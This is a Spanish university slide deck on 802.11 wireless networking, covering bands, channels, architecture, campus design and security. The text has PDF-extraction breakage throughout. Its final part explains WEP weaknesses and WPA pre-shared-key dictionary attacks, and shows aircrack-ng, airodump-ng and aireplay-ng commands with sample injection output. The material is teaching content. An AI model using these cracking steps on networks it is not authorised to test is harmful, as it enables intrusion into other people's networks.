Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Cundo surgen?
En 1985 Estados Unidos liber las bandas de
f
frecuencia
i Industrial,
I d t i l Cientfica
Ci tfi y Mdica
Mdi (ISM)
Estas bandas son:
902 - 928 MHz
2.4 - 2.4853 GHz
5.725 - 5.85 GHz
WWAN
(Wide)
WMAN
(Metropolitan)
WLAN
(Local)
WPAN
(Personal)
Estndar
GSM/GPRS/UM
TS
IEEE 802.16
IEEE 802.11
IEEE 802.15
WiMAX
WiFi
Bluetooth, ZigBee
Certificacin
Velocidad
9,6/170/2000
Kb/s
15-134 Mb/s
1-54 Mb/s
Frecuencia
0,9/1,8/2,1 GHz
2-66 GHz
2,4 y 5 GHz
Infrarrojos
2,4 GHz
Rango
35 Km
1 50 Km
30 - 150 m
10 m
Tcnica radio
Varias
Varias
FHSS, DSSS,
OFDM
FHSS
Itinerancia
(roaming)
S
(802.16e)
No
Equivalente a:
Conex. telef.
Conex
telef
(mdem)
ADSL CATV
ADSL,
LAN
Cables de
conexin
Subcapa
LLC
802
2.1: Gestin
802.10
0: Seguridad
802.3:
CSMA/CD
(Ethernet)
802.5:
Token
Ring
802.11:
WLAN
802.12:
Demand
Priority
802.15:
WPAN
802.16
BBWA
802.17
RPR
802.20:
MBWA
Subcapa
MAC
(Media
Access
Control)
Capa
Fsica
Capa de
enlace
Subcapa MAC:
A
Acceso
all medio
di (CSMA/CA)
Acuses de recibo
Fragmentacin
Confidencialidad (WEP)
PLCP (Physical Layer Convergence Procedure)
Capa
fsica
PMD ((Physical
y
Media Dependent)
p
)
Infrarrojos
802.11
FHSS
802.11
DSSS
802.11
HR/DSSS
802.11b
OFDM
802.11a
DSSS-OFDM
802.11g
IIntroduccin
t d
i
Arquitectura
q
Conectividad
Ni l f
Nivel
fsico
i
Diseo
se o de redes
edes inalmbricas
a b cas
Puentes inalmbricos
Seguridad
147.156.2.2/24
Tarjeta PCI
147.156.1.15/24
Tarjeta PCMCIA
Internet
147.156.1.23/24
Punto
P
t de
d
acceso (AP)
147.156.1.24/24
147.156.1.21/24
En el AP el canal se configura
manualmente. Las estaciones se
adaptan automticamente
147.156.1.1/24
rea de
cobertura
147.156.1.20/24
Internet
BSS 1
Canal 1
Sistema de
distribucin (DS)
Internet
Canal 1
Repetidor
i l b i
inalmbrico
Internet
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Canal 1
C
Canal
l 13
Puente
inalmbrico
Internet
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
DS
AP
ESS
STA
Red de
Infrastructura
AP
STA
STA
STA
BSS
STA
STA: Station
AP: Access Point
DS: Distribution System
BSS: Basic Service Set
ESS: Extended Service Set
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
STA
Red Ad
Hoc
STA
STA
IBSS
Direccin de la
interfaz
Ethernet
(asociada con
la direccin IP)
BSSID para 802.11b
BSSID para 802.11a
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Router inalmbrico
Este aparato contiene:
Un
Un router con dos interfaces
ethernet y funciones de NAT,
cortafuegos, etc.
Un switch ethernet con seis
puertos
Un punto de acceso 802.11
Este es el
BSSID
192.168.1.1
Internet
00:0F:66:09:4E:11
00:0F:66:09:4E:10
00:0F:66:09:4E:0F
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Tipos
p de tramas 802.11
Tramas
T
de
d gestin
ti
Tramas de control
Tramas RTS (Request To Send) y CTS (Clear To Send)
Tramas ACK (Acknowledgement,
(Acknowledgement acuse de recibo)
Asociacin
Autentificacin
Una red
U
d iinalmbrica
l b i sin
i proteccin
t
i esta
t muy expuesta
t a
ataques. Para evitarlos se debe utilizar algn protocolo de
proteccin, como WEP, WPA, etc.
Cuando se utiliza proteccin la red va a obligar a las estaciones
a autentificarse antes de asociarlas
La autentificacin se hace antes de asociarse y no se hace al
reasociarse.
Cuando una estacin cambia de AP dentro de un mismo SSID
solo tiene q
que reasociarse,, no reautenticarse
La autentificacin se hace con un determinado SSID, la
asociacin con un determinado BSSID
No Autenticado
No Asociado
SSID: patata
Deautenticacin
Autenticado
No Asociado
Autenticado
No Asociado
Asociacin
Deasociacin
BSSID: 000B86A867C1
BSSID: 000B86A882E1
BSSID: 000B86A87781
SSID en la red de la UZ
Inicialmente:
Wiuz-1(Red abierta con nocat)
Wiuz-2 (802.1X)
Posteriormente:
Wiuz-1 Wiuz
Wiuz-2
Wiuz 2 Eduroam (802.1X
(802 1X EAP-TTLS
EAP TTLS /WPA/WPA2)
SSID en la red de la UZ
MAN Unizar
PacketShaper
Cisco WLSE
Puntos de Acceso
WDS
Vlan 266
Vlan 896 (LOCAL)
GESTION
Vlan 640
OPEN
SSID: wiuz
Vlan 641
802.1x
SSID
eduroam
155 210 x y
155.210.x.y
Gateway -NoCat
DHCP
Eduroam
Eduroam (educational roaming) es un servicio de
itinerancia para usuarios de las redes acadmicas
europeas
Se basa en el intercambio de credenciales
usuario/password entre servidores RADIUS de
diferentes instituciones de forma que se permita el
acceso transparente a recursos remotos
remotos, p
p. ej
ej. red
inalmbrica de otra organizacin.
Esta extendido por toda Europa y tambin por Japn
y Australia. Solo Canada en Amrica
.uk
on
nd
o
l
i
un
@
m
up
@
un
ilo
nd
on
.u
k
.es
Resto dominioss
Enlazar servidores
RADIUS y d
delegar
l
autenticacin en el
servidor origen del
usuario
Infraestructura
wireless no cambia
BSC
CESCA
CTTC
ICFO
UAB
UdG
UdL
UPC
UPF
URL
URV
UVic
XTEC
CSIC
CTI
RECETGA
CESGA
UDC
USC
UVIGO
RICA
CICA
UAL
UCA
UCO
UGR
UHU
UMA
UPO
US
EHU
RedIRIS
UA
UAH
UAM
UC3M
UCLM
UCM
UIB
UIMP
UJI
ULPGC
UM
UMH
UNAVARRA
UNED
UNICAN
UNILEON
UNIOVI
UNIRIOJA
UNIZAR
UPCT
UPM
UPV
USAL
UV
UVA
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Capa de
enlace
Subcapa MAC:
A
Acceso
all medio
di (CSMA/CA)
Acuses de recibo
Fragmentacin
Confidencialidad (WEP)
PLCP (Physical Layer Convergence Procedure)
Capa
fsica
PMD ((Physical
y
Media Dependent)
p
)
Infrarrojos
802.11
FHSS
802.11
DSSS
802.11
HR/DSSS
802.11b
OFDM
802.11a
DSSS-OFDM
802.11g
Evolucin de 802.11
Fecha
Estndar
1986
1993
Propietario 2 Mb/s
1997
802.11
(legacy)
1999
Alcance Alcance
i t i
interior
exterior
t i
100 m
0,9 Mb/s
20 m
100 m
2 Mb/s
0,9 Mb/s
Infrarrojos
FHSS 2,4 GHz
DSSS 2,4
2 4 GHz
20 m
100 m
802.11a
54 Mb/s
23 Mb/s
120 m
1999
802.11b
11 Mb/s
4,3 Mb/s
38 m
140 m
2003
802.11g
54 Mb/s
19 mb/s
140 m
6/2009 802.11n
(est.)
248 Mb/s
74 Mb/s
70 m
250 m
6/2008 802.11y
(est.)
54 Mb/s
23 Mb/s
3,7 GHz
50 m
5 Km
Capa fsica.
Subcapa PLCP
Capa
fsica
Subcapa PLCP
(Physical Layer Convergence Protocol)
Subcapa PMD
S
(Physical Medium Dependent)
Bandas ISM
La ITU-R ha previsto unas bandas, llamadas ISM (IndustrialScientific-Medical) en las que se puede emitir sin licencia
Algunos telfonos inalmbricos (los DECT no), algunos mandos
a distancia y los hornos de microondas hacen uso de las
bandas ISM. De esta forma no hay que pedir licencia al comprar
un horno de microondas
Las redes inalmbrica utilizan siempre
p bandas ISM,, p
pues no
sera viable pedir licencia para cada red inalmbrica que se
quisiera instalar
La emisin en la banda ISM, aunque no est regulada debe
cumplir unas condiciones bastante estrictas en la potencia
mxima de emisin y el tipo de antena utilizado
Telefona GSM
Hornos de
microondas
Banda
Anchura
Regin ITU-T
Uso en WLAN
30 kHz
Todas
No
14 kHz
Todas
No
326 kHz
Todas
No
40 kHz
Todas
No
174 kHz
1 (EMEA)
No
26 MHz
2 (Amrica)
100 MHz
Todas
150 MHz
Todas
802.11 a
24 24.25
24 25 GHz
250 MHz
Todas
No
61 61,5 GHz
500 MHz
Todas
No
1 GHz
Todas
No
244 246 GH
GHz
2 GH
GHz
Todas
No
Banda de 2,4
, GHz (802.11b/g)
(
g)
E
Es la
l ms
utilizada
tili d
La utilizan tres estndares:
802.11
802 11 (legacy): FHSS y DSSS: 1 y 2 Mb/s
802.11b: HR/DSSS: 5,5 y 11 Mb/s
802.11g: DSSS-OFDM: de 6 a 54 Mb/s
Codificacin
FHSS
Barker
DSSS
DSSS
DSSS
B k
Barker
CCK
OFDM
Potencia Velocidad
max.
((Mb/s))
100 mW
100 mW
W
100 mW
30 mW
802.11
legacy
g y
802.11b
802.11g
5,5
11
Opc
Opc.
12
18
Opc.
24
36
Opc.
48
Opc
Opc.
54
Opc.
Espectro disperso
Espectro
p
disperso
p
p
por salto de
frecuencia (FHSS)
Inventado p
por la actriz austraca ((e ingeniero
g
de
telecomunicaciones) Hedy Lamarr en 1941, como sistema de radio
para guiar los misiles de los aliados contra Hitler
El emisor y el receptor van cambiando continuamente de
f
frecuencia,
i siguiendo
i i d una secuencia
i previamente
i
t acordada
d d
Para emitir se emplea un canal estrecho y se concentra en l toda
la energa
E 802.11
En
802 11 se utilizan
tili
78 canales
l d
de 1 Mhz
Mh y se cambia
bi d
de canall
cada 0,4 segundos. En Bluetooth se cambia ms a menudo
Puede haber diferentes emisores simultneos si usan distinta
secuencia o si usan la misma pero no van sincronizados
Espectro
p
disperso
p
p
por Secuencia Directa
(DSSS)
2,4835 GHz
C. 78
Frecue
encia
Frecuen
ncia
C. 73
C. 58
C. 45
0,4 s
Canal 13
Canal 7
Interferencia
Interferencia
C. 20
1 MHz
22 MHz
C. 9
2,4 GHz
Frequency Hopping
Tiempo
Canal 1
2,4 GHz
Tiempo
Direct Sequence
El canal es muy ancho; la seal contiene
mucha informacin redundante
Aunque haya interferencia el receptor puede
extraer los datos de la seal
Po
otencia (mW
W/Hz)
Potenc
cia (mW/Hz)
100
22 MHz
Frecuencia (MHz)
Frecuencia (MHz)
Frequency Hopping
Direct Sequence
Ampliacin
Redes 7-49
Servicio de Informtica y Comunicaciones - Universidad
de Zaragoza
Techo
Tiempo
Resultado combinado
Obstruccin
Suelo
Tiempo
Antenas diversidad
Canales a 2
2,4
4 GHz (802.11b/g)
(802 11b/g)
Canal
Frecuencia
central (MHz)
Regin o pas
Amrica/China
EMEA
Japn
Israel
2412
2417
2422
2427
2432
2437
2442
2447
2452
10
2457
11
2462
12
2467
13
2472
14
2484
10 11
2,5 GHz
14
10
13
13
5
9
Europa
u opa (canales
(ca a es 1 a 13)
3)
14
11
12 13
12
2,4 GHz
11
6
Amrica / China (canales 1 a 11)
6
Japn (canales 1 a 14)
3
9
Israel (canales 3 a 9)
22 MHz
11
14
Dominios regulatorios
Amrica
United States, Canada, Mexico, America Samoa, Antigua and Barbuda, Argentina, Aruba, Ashmore and Cartier
Islands Australia
Islands,
Australia, Bahamas
Bahamas, Baker Island
Island, Barbados
Barbados, Bermuda
Bermuda, Bolivia
Bolivia, Bouvet Island
Island, Brazil
Brazil, Cameroon
Cameroon, Central
African Republic, Chad, Chile, China, Christmas Island, Clipperton Island, Cocos Island, Colombia, Cook Island,
Coral Sea Islands, Costa Rica, Ecuador, El Salvador, Europa Island, Faroe Islands, Fiji, Glorioso Islands, Grenada,
Guadeloupe, Guam, Guatemala, Guyana, Haiti, Heard Island, Honduras, Hong Kong, Jamaica, Kingman Reef,
Malawi, Malaysia, Mali, Marshall Islands, Midway Islands, Navassa Island, New Caledonia, New Guinea, New
Zealand Nicaragua
Zealand,
Nicaragua, Niger
Niger, Nigeria
Nigeria, Norfolk Island
Island, Northern Mariana Islands
Islands, Palau
Palau, Palmyra Atoll
Atoll, Panama
Panama, Papua
New Guinea, Paracel Islands, Paraguay, Peru, Phillippines, Pitcairn Islands, Puerto Rico, Russia, Saint Kitts and
Nevis, Saint Lucia, Saint Pierre and Miquelon, Saint Vincent and the Grenadines, Samoa, Saudi Arabia, Solomon
Islands, South Korea, Spratly Islands, Taiwan, Togo, Tonga, Trinidad and Tobago, Tromelin Island, Turks and
Caicos Islands, Uruguay, US Virgin Islands, Venezuela, Wake Island, Western Sahara
EMEA
Af h i t
Afghanistan,
Albania,
Alb i Al
Algeria,
i A
Andorra,
d
A
Angola,
l A
Angullia,
lli A
Armenia,Austria,
i A ti A
Azerbaijan,
b ij
B
Bahrain,
h i B
Bangladesh,
l d h
Bassas da India, Belarus,Belgium, Belize, Benin, Bhutan, Bosnia, Botswana, British Indian OceanTerritory, British
Virgin Islands, Brunei, Bulgaria, Burkina Faso, Burma,Burundi, Cambodia, Cape Verde, Cayman Islands, Comoros,
Cote dIvoire, Croatia, Cyprus, Czech Republic, Democratic Republic of the Congo, Denmark, Djibouti, Dominica,
Egypt, Equatorial Guinea, Eritrea, Estonia, Ethiopia, Falkland Islands, Finland, France, French Guiana, French
Pol nesia French So
Polynesia,
Southern
thern and Antarctic Lands
Lands, Gabon
Gabon, Gambia
Gambia, Georgia
Georgia, German
Germany, Ghana
Ghana, Gilbraltar
Gilbraltar, Greece
Greece,
Greenland, Guernsey, Guinea, Guinea-Bissau, Hungary, Iceland, India, Indonesia, Ireland, Isle of Man, Israel, Italy,
Ivory Coast, Jan Mayan, Jarvis Island, Jersey, Johnston Atoll, Jordan, Juan de Nova Island, Kazakhstan, Kenya,
Kiribati, Kuwait, Kyrgyzstan, Laos, Latvia, Lebanon, Lesotho, Liberia, Liechtenstein, Lithuania, Luxembourg, Macau,
Macedonia, Madagascar, Maldives, Malta, Martinique, Mauritania, Mauritius, Mayotte, Micronesia, Moldova,
Monaco Mongolia
Monaco,
Mongolia, Montserrat
Montserrat, Morocco
Morocco, Mozambique
Mozambique, Namibia
Namibia, Nauru
Nauru, Nepal
Nepal, Netherlands
Netherlands, Niue
Niue, Norway
Norway, Oman
Oman,
Pakistan, Poland, Portugal, Qatar, Republic of the Congo, Reunion, Romania, Rwanda, Saint Helena, San Marino,
Sao Tome and Principe, Senegal, Serbia, Seychelles, Sierra Leone, Singapore, Slovak Republic, Slovenia,
Somalia, South Africa, South Georgia, Spain, Sri Lanka, Sudan, Suriname, Svalbard, Swaziland, Sweden,
Switzerland, Syria, Tajikistan, Tanzania, Thailand, Tokelau, Tunisia, Turkey, Turkmenistan, Tuvalu, Uganda,
Ukraine United Arab Emirates
Ukraine,
Emirates, United Kingdom,
Kingdom Uzbekistan,
Uzbekistan Vanuatu
Vanuatu, Vatican City
City, Vietnam
Vietnam, Wallis and Futuna
Futuna,
Yemen, Zaire, Zambia, Zimbabwe
802.11a
802
11a utiliza la banda de 5 GHz
GHz, que permite canales de
mayor ancho de banda
La tcnica de radio es OFDM (Orthogonal Frequency Division
Multiplexing)
Velocidades como en 802.11g: 6, 9, 12, 18, 24, 36, 48 y 54
Mb/s (6, 12 y 24 son obligatorias)
Incompatible con 802
802.11b/g.
11b/g La radio va a distinta frecuencia
En Europa la banda de 5 GHz se empez a usar ms tarde que
en Amrica, pues se exigi que incorporara mecanismos de
j
dinmico de la frecuencia y la p
potencia ((802.11h)) p
para
ajuste
evitar interferencia con radares y otros aparatos
Anchura de canal:
20 MHz
Europa
Max. pot.
200 mW
Europa
Max pot.
Max.
pot
1W
36
40
44
48
52
56
60
64
100
104
108
112
116
120
124
128
132
136
140
149
153
157
161
165
Frecuencia central
(MHz)
5180
5200
5220
5240
5260
5280
5300
5320
5500
5520
5540
5560
5580
5600
5620
5640
5660
5680
5700
5745
5765
5785
5805
5825
Europa
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
-
Taiwan
X
X
X
X
X
Asia
X
X
X
X
-
Funcionamiento de OFDM
Funcionamiento de OFDM
Velocidad
(Mb/s)
BPSK
125
BPSK
187,5
QBPSK
250
12
QBPSK
375
18
16QAM
500
24
16QAM
750
36
64QAM
1000
48
64QAM
1125
54
Ventajas:
En 5 GHz hay menos interferencias que en 2,4 GHz: Bluetooth,
hornos de microondas
microondas, mandos a distancia
distancia, etc
etc. En el futuro es
previsible que aparezcan ms equipos que utilicen la banda de 5
GHz y haya ms interferencia
En 5 GHz hay ms canales no solapados (19 frente a 4). Es ms
fcil evitar interferencias,
interferencias especialmente al disear una cobertura
celular
Inconvenientes de 5 GHz:
Menor alcance en APs (antenas omnidireccionales)
Mayor costo de los equipos emisores/receptores
Mayor consumo (menor duracin de las bateras)
Relacin velocidad/alcance
Las seales de 5 GHz
tienen menor alcance
que las de 2,4 GHz
30
60
Rango (metros)
90
(11 Mb/s)
(54 Mb/s)
Rendimiento de WLANs
802.11b 802.11a
802.11g
puro
802.11g
mixto con
CTS-to-self
802.11g
mixto con
RTS/CTS
5,8
24,7
24,7
14,7
11,8
15
5,8
19,8
24,7
14,7
11,8
30
5,8
12,4
19,8
12,7
10,6
45
5,8
4,9
12,4
9,1
8,0
60
3,7
4,9
4,2
4,1
75
16
1,6
16
1,6
16
1,6
16
1,6
90
0,9
0,9
0,9
0,9
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Antenas ms habituales
Antena dipolo omnidireccional
de 2,14 dBi de ganancia
Radiacin horizontal
Antenas
Relacin antena-potencia
Relacin ganancia-potencia
para 802.11b
100
2,2
50
5,2
30
30
8,5
12
13,5
21
Canal 1
Canal 13
Canal 7
C
Canal
l1
Canal 13
260 m
C
Canal
l7
600 m
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Canal 1
Canal 13
Canal 7
260 m
Canal 13
Canal 7
Canal 1
600 m
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
inalmbrica en un campus
p
Antenas dipolo diversidad (2,14dBi) en las aulas y de parche (8,5 dBi) montadas en
pared para el patio
Aula 1
Aula 2
Aula 3
Aula 4
Canal 6
Canal 1
Canal 11
Pasillo
260 m
Aula 5
Aula 6
Canal 6
Aula 7
Aula 8
Canal 11
Canal 1
Edificio
Patio
600 m
C5
C1
C1
Cuarta
C9
C9
C5
C5
C 13
C1
C5
Escalera
Ascensores
Primera
Baja
j
C5
Escalera
Ascensores
Tercera
Segunda
C 13
C1
Quinta
Escalera
Ascensores
Stano
Planta
Funciones adicionales
Existen
E
i t bsicamente
b i
t d
dos modelos
d l d
de gestin
ti d
de redes
d iinalmbricas:
l b i
APs FAT (gordos): los APs pueden funcionar de forma autnoma,
cada uno contiene todo el software y configuracin.
APs THIN(
THIN(delgados):
delgados ): los APs no pueden funcionar solos
solos, para ello
necesitan estar conectados a un equipo de control, que contiene la
configuracin y el software
En los sistemas THIN el equipo de control se encarga de ajustar en
cada
d AP ell canall y lla potencia
t
i iintentando
t t d minimizar
i i i
iinterferencias.
t f
i
Tambin se pueden detectar, e incluso neutralizar, APs piratas
(llamados rogue APs) que pueden estar interfiriendo con la red legal
o que pueden suponer un agujero de seguridad
DETECTOR DE FALLOS
GENERADOR DE MAPAS
Hardware Instalado en la UZ
Puntos de Acceso
66 Ci
Cisco 1100
360 Cisco 1131 (Activos 802.11b/g)
15 Cisco 1241 (Exteriores)
(
)
Equipamiento de Gestin
3S
Servidores
id
1 appliance Cisco WLSE
p en modo WDS
9 Ap
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Hasta 10 Km
Visin directa
Cable coaxial de 50 de
baja atenuacin lo ms corto
posible (30 m max.)
Ethernet
Ethernet
Restricciones ETSI:
Configuracin multipunto
Antena omnidireccional o de
parche ((o varias p
p
parablicas))
Antena direccional
(parche, yagi o parablica)
d + 2/2
d + /2
d
Primera zona Fresnel
Segunda zona Fresnel
Anchura zona Fresnel para 2,4 GHz:
Distancia
100
m
500
m
2 Km
10
Km
1 Zona Fresnel
3,5 m
8m
16 m
36 m
2 Zona Fresnel
5m
12 m
22 m
50 m
Canal 10
Edificio B
Hasta
10 Km
Canal 11
Edificio C
Hasta
10 Km
Canal 10
Edificio B
Hasta
10 Km
Canal 10
Edificio C
Hasta
10 Km
Hasta 54 Mb/s
Mb/s, compartidos entre ambos enlaces
Posible problema de estacin oculta (entre A y C). Necesidad de utilizar mensajes RTS/CTS
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
C
Canal
l7
Canal 13
Introduccin
Arquitectura
Conectividad
Nivel fsico
Diseo de redes inalmbricas
Puentes inalmbricos
Seguridad
Hoy en da
da, las Wireless LAN se estn convirtiendo
poco a poco en parte esencial de las redes LAN
tradicionales:
Bajos
B
j costes
t de
d iinstalacin
t l i
Disponibilidad
No requiere de software adicional
Movilidad
Conceptos bsicos
ESSID: Extended Service Set Identifier
SSID: cadena de 32 caracteres como mximo que es necesario
conocer para unir un cliente a la red.
Beacon Frames: p
paquetes
q
q
que transmite un AP p
para anunciar su
disponibiidad y caractersticas.
WEP: Wired Equivalent Privacy, protocolo de encriptacin a nivel
2 para redes Wireless puede ser WEP64
WEP64, WEP128 y hasta 256
256.
OSA: Open System Authentication
SKA: Shared Key Authentication
ACL: Access Control List
List, mtodo mediante el cual slo se permite
unirse a la red a las direcciones MAC seleccionadas.
E
Escuchas
h ilegales
il
l
E
Esto
constituye
i
un ejemplo
j
l d
de ataque activo.
i
Proteccin
Abiertas
Ninguna
Filtrado MAC
Ocultar SSID
Portales Captivos
p
VPN
Cifradas
Aunque
u que un
u cliente
c e e pueda validarse
va da se contra
co a el
e punto
pu o de
acceso, si no conoce las claves de encriptacin de los
datos no podr enviar informacin.
REDES ABIERTAS
Open Autenticacin
Filtrado MAC
NO SEGURO
-- Falsificacin de MAC (smac)
Ocultar SSID
NO SEGURO
-- Se puede ver
(kismet)
Portales Captivos
NO SEGURO
-- Falsificacin de MAC (smac)
VPN
SEGURO
Dependiendo del tunel por defecto seguro (MitM)
Portal Captivo
Portal Captivo
p
Wiuz
Red abierta sin cifrar
Servidor NoCat
Fcil acceso y configuracin
Red con mayor nmero de usuarios
Si restricciones
Sin
i i
actuales
l
LDAP
Gateway -NoCat
DHCP
Cliente
Acceso al medio
(Sin encriptacin)
Solicitud parametros red (DHCP)
Dir.IP,mscara,gateway,
Dir
IP mscara gateway
servidores DNS, WINS
Acceso a internet
Usuario/pass
Usuario/pass
Usuario OK
GRUPO RADIUS
Usuario OK
GRUPO LDAP
Acceso a internet
Maquina autorizada
NO SEGURO
NO SEGURO
SEGURO con rotacin de claves
SEGURO dependiendo
d
di d de
d la
l clave
l
SEGURO
SEGURO dependiendo de la clave
SEGURO
Introduccin al WEP
Sistema de encriptacin
p
estndar 802.11
Se implementa en la capa MAC
Soportada por la mayora de vendedores
Cifra los datos enviados a travs de las ondas
Utiliza el algoritmo de encriptacin RC4
Funcionamiento WEP
Concatena la llave simtrica compartida, de 40 104 bits, de la
estacin con un vector de inicializacin aleatorio (IV) de 24
Se g
genera un nmero p
pseudo-aleatrio,, de longitud
g
igual
g
al
payload (datos + CRC), y un valor de 32 bits para chequear la
integridad (ICV)
Esta llave y el ICV, junto con el payload (datos + CRC), se
combinan a travs de un proceso XOR que producir el texto
cifrado
La trama enviada incluye el texto cifrado, y el IV e ICV sin cifrar
Funcionamiento WEP
El ICV acta como checksum, ser utilizado por la
estacin receptora
p
para recalcularlo y compararlo
p
p
con la
recibida
Si el ICV no concuerda con el ICV calculado, se
descarta la trama e incluso al emisor de la misma
El IV se utiliza para descifrar, junto con la llave
simtrica compartida,
p
, los datos y el CRC de la trama
Debilidades WEP
Longitud del vector IV insuficiente (24 bits)
El IV se repetir cada cierto tiempo de
transmisin continua para paquetes
distintos, pudiendo averiguar la llave
compartida
Utilizacin de llaves estticas, el cambio de
llave se debe realizar manualmente
A pesar de todo, WEP ofrece un mnimo de
seguridad
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Ataques
q
y vulnerabilidades
Ataques pasivos
Escuchas
s s de ttrfico
co
Anlisis
Ataques activos
Retransmisin de mensajes
Suplantacin de identidades
Denegacin de servicio
Modificacin de mensajes
j
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Ataques y vulnerabilidades
El riesgo de utilizacin del keystream
Diccionarios de desencriptacin
Gestin de claves
Autenticacin de mensajes
Modificacin del mensaje
Inyeccin de mensajes
Desencriptacin de mensajes
Redireccin
R di
i IP
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Wi-Fi
Wi
Fi Protected Access (WPA)
WPA Empresarial
Soporta 802.1x
Autenticacin mutua
EAP
Requiere hard cliente actualizado o WPA nativo
Requiere un suplicante que soporte WPA
AP WPA nativo o actualizado
Servidor autenticacin - RADIUS
Implementacin de 802.11i
802 11i de la WI-FI Alliance
Se requiere nuevos AP
Los PDAs antiguos tampoco sirven
Algunos clientes pueden servir
Septiembre 2004 Primeras Certificaciones
WPA y WPA2 son compatibles
Existe la
l opcin
de
d trabajar
b
en modo
d mixto:WPA/WPA2
/
2
Upgrade de WPA a WPA2:soft,hard
WPA2 Personal password
WPA2 Enterprise 802.1x y EAP
Basado en Algoritmo AES
WPA2 FIPS 140-2
Qu es 802.1x
Provee un mtodo para la autenticacin y autorizacin de
conexiones a una RED INALMBRICA
Autenticacin basada en el usuario; puede usar credenciales tales
como contraseas
t
o Certificados
C tifi d
Utiliza EAP (Extensible Authentication Protocol) entre la estacin
mvil y el punto de Acceso
Aprovechamiento
p
de p
protocolos AAA tales como RADIUS p
para
centralizar autenticacin y autorizaciones
Seguridad 802.1x
Por qu RADIUS
La autenticacin se basa en el usuario, en vez de
basarse en el dispositivo
Elimina la necesidad de almacenar informacin de los
usuarios en cada access point de la RED, por tanto es
considerablemente ms fcil de administrar y configurar
RADIUS ya ha sido ampliamente difundido para otros
tipos de autenticacin en la red de trabajo
Seguridad 802.1x
Protocolo de Autenticacin Extensible (EAP)
Los tipos de autenticacin EAP proveen de
seguridad a las redes 802.1x
Protege las credenciales
Protege la seguridad de los datos
Tipos comunes de EAP
EAP-TLS, EAP-TTLS, EAP-MD5, EAP-Cisco
Wireless (LEAP), EAP-PEAP
SUITE AIRCRACK
man iwconfig
g
iwconfig --help
Servicio de Informtica y Comunicaciones - Universidad de Zaragoza
Salida de iwconfig
Salida de iwconfig
Salida de iwconfig
airodump-ng
airodump
ng <opciones>
opciones <interface>
interface [,
[,<interface>,...]
interface ,...]
SNIFFING IVS
LEYENDA
1 = Keybyte, es decir el nmero de cada uno de los
bytes o caracteres de la clave.
2 = Profundidad de la actual bsqueda de la clave
3 = Byte o caracter que se est probando
4 = Votos o nmero de probabilidades de que sea
correcto
t ese byte
b t
CRACKING
FUNCIONAMIENTO AIRCRACK
FUNCIONAMIENTO AIRCRACK
FUNCIONAMIENTO AIRCRACK
FUNCIONAMIENTO AIRCRACK
Cuanto mayor sea el fudge factor, el nmero de
claves a probar crecer tremendamente y mayor
ser el tiempo que se est ejecutando aircrackng.
En cambio
cambio, cuantos ms paquetes de datos
tengamos, se minimizar la necesidad de aplicar
fuerza bruta a muchas claves, lo que hace que
no trabaje tanto tiempo la CPU y se reduce
mucho el tiempo necesario para encontrar la
clave.
clave
Las t
L
tcnicas
i
mencionadas
i
d h
hasta
t ahora
h
no ffuncionan
i
para
claves WPA/WPA2 pre-shared. La nica forma de crackear
estas claves pre-compartidas es a travs de un ataque de
diccionario Esta capacidad est tambin incluida en
diccionario.
aircrack-ng.
Con claves pre-compartidas, el cliente y el punto de acceso
establecen las claves que se van a usar en sus
comunicaciones al comienzo cuando el cliente se asocia por
primera vez con el punto de acceso. Hay cuatro paquetes
handshake
handshake entre el cliente y el punto de acceso
acceso.
Airodump-ng puede capturar estos cuatro paquetes
handshake. Y usando un diccionario con una lista de
palabras aircrack-ng
palabras,
aircrack ng duplica los cuatro paquetes handshake
para mirar si hay alguna palabra en el diccionario que
coincida con el resultado de los cuatro paquetes handshake.
USO AIRCRACK
USO AIRCRACK
TEST DE INYECCION
aireplay-ng -9 <interfaz>
The system responds:
16:29:41 wlan0 channel: 9
16:29:41 Trying broadcast probe requests...
16:29:41 Injection is working!
16:29:42 Found 5 APs
16:29:42 Trying directed probe requests...
16:29:42 00:09:5B:5C:CD:2A - channel: 11 - 'NETGEAR
16:29:48 0/30: 0%
16:29:48 00:14:BF:A8:65:AC - channel: 9 - 'title'
16:29:54 0/30: 0%
16:29:54 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
16:29:55 Ping (min/avg/max): 2
2.763ms/4.190ms/8.159ms
763ms/4 190ms/8 159ms
16:29:55 27/30: 90%
TEST DE INYECCION
Respuesta
16:29:41
16 29 41 wlan0
l 0 channel:
h
l 9
9: interfaz
i t f que se emplea
l y en qu
canal
16:29:41 Injection is working!: Confirmacin de que la tarjeta
puede inyectar.
inyectar
16:29:42 Found 5 APs: APs encontrados en el broadcast.
16:29:42 00:09:5B:5C:CD:2A - channel: 11 - NETGEAR: AP
encontrado en un canal distinto
distinto, normal por los casos de solape
de frecuencias
16:29:55 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms:
Respuesta del AP al ping
16:29:55 27/30: 90% for ssid: Respuesta del AP en el que
inyectamos
TEST DE INYECCION
Se confirma si la tarjeta
j
inyecta
y
en la red especificada
p
TEST DE INYECCION
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
El uso de aireplay
p y es el siguiente:
g
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
ATAQUES: AIREPLAY
Opciones de origen:
-i iface : capturar paquetes con esa interface
-r archivo : utilizar paquetes de ese archivo cap
Modos
M d d
